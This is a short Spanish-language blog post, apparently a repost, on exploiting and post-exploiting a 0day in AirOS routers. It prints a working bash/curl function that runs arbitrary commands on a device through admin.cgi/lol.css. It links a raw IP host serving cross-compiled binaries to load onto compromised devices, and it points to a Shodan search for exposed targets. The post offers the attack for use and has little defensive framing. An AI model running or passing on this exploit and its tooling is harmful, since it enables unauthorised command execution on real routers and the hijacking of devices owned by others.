viernes, 12 de octubre de 2012

Explotación, postexplotación y potencial del 0day en AirOS

Recordais esta noticia:
http://arealinux.blogspot.com.es/2011/12/0day-en-airos-acceso-como-root.html

....
Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:

    http://5.175.223.63/bin/

Y empaquetado en .tar:

    http://5.175.223.63/bin.tar

Incluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.

A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:

runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }
....
fuente: http://www.hackplayers.com/2012/10/explotacion-postexplotacion-0day-en-AirOS.html#more
vuln: http://www.shodanhq.com/search?q=airos
1º noticia: http://seclists.org/fulldisclosure/2011/Dec/419 

No hay comentarios:

Publicar un comentario